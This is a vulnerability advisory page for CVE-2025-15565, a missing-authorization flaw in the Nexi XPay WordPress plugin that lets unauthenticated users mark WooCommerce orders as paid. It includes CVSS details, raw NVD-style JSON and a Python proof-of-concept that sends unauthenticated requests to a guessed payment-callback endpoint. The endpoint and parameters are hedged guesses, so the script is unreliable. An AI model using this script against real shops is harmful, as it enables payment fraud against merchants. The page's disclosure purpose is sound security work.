Security Vulnerability Report
中文
CVE-2025-15565 CVSS 5.3 MEDIUM

CVE-2025-15565

Published: 2026-04-14 22:16:28
Last Modified: 2026-04-22 20:23:16
Source: [email protected]

Description

The Nexi XPay plugin for WordPress is vulnerable to unauthorized modification of data due to missing authorization checks on the redirect function in all versions up to, and including, 8.3.0. This makes it possible for unauthenticated attackers to mark pending WooCommerce orders as paid/completed.

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Nexi XPay plugin <= 8.3.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# Proof of Concept for CVE-2025-15565 # This script demonstrates unauthorized order status modification. # Note: The exact endpoint URL may vary based on plugin configuration. import requests def exploit(target_url, order_id): # The vulnerable endpoint is typically the WooCommerce API callback for the gateway # Example: http://target.com/?wc-api=WC_Gateway_XPay_Process_Completion endpoint = f"{target_url}/?wc-api=WC_Gateway_XPay_Process_Completion" # Parameters to simulate a successful payment callback # Attackers can guess valid order_ids as they are often sequential. params = { "order_id": order_id, "status": "completed", # or specific flag indicating success "id_order": order_id # some plugins use different param names } try: # Send unauthenticated GET/POST request response = requests.get(endpoint, params=params, timeout=10) if response.status_code == 200: print(f"[+] Request sent successfully to {endpoint}") print(f"[+] Attempted to mark Order ID {order_id} as paid.") print(f"[+] Response: {response.text[:100]}") else: print(f"[-] Request failed with status code: {response.status_code}") except Exception as e: print(f"[-] Error occurred: {e}") if __name__ == "__main__": # Replace with the actual target URL and a valid Order ID target = "http://example.com" order = "12345" exploit(target, order)

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-15565", "sourceIdentifier": "[email protected]", "published": "2026-04-14T22:16:27.727", "lastModified": "2026-04-22T20:23:16.350", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Nexi XPay plugin for WordPress is vulnerable to unauthorized modification of data due to missing authorization checks on the redirect function in all versions up to, and including, 8.3.0. This makes it possible for unauthenticated attackers to mark pending WooCommerce orders as paid/completed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/cartasi-x-pay/tags/8.2.0/src/classes/Nexi/WC_Gateway_XPay_Process_Completion.php#L268", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/f420151b-c783-49b1-b0e9-e936a904278a?source=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.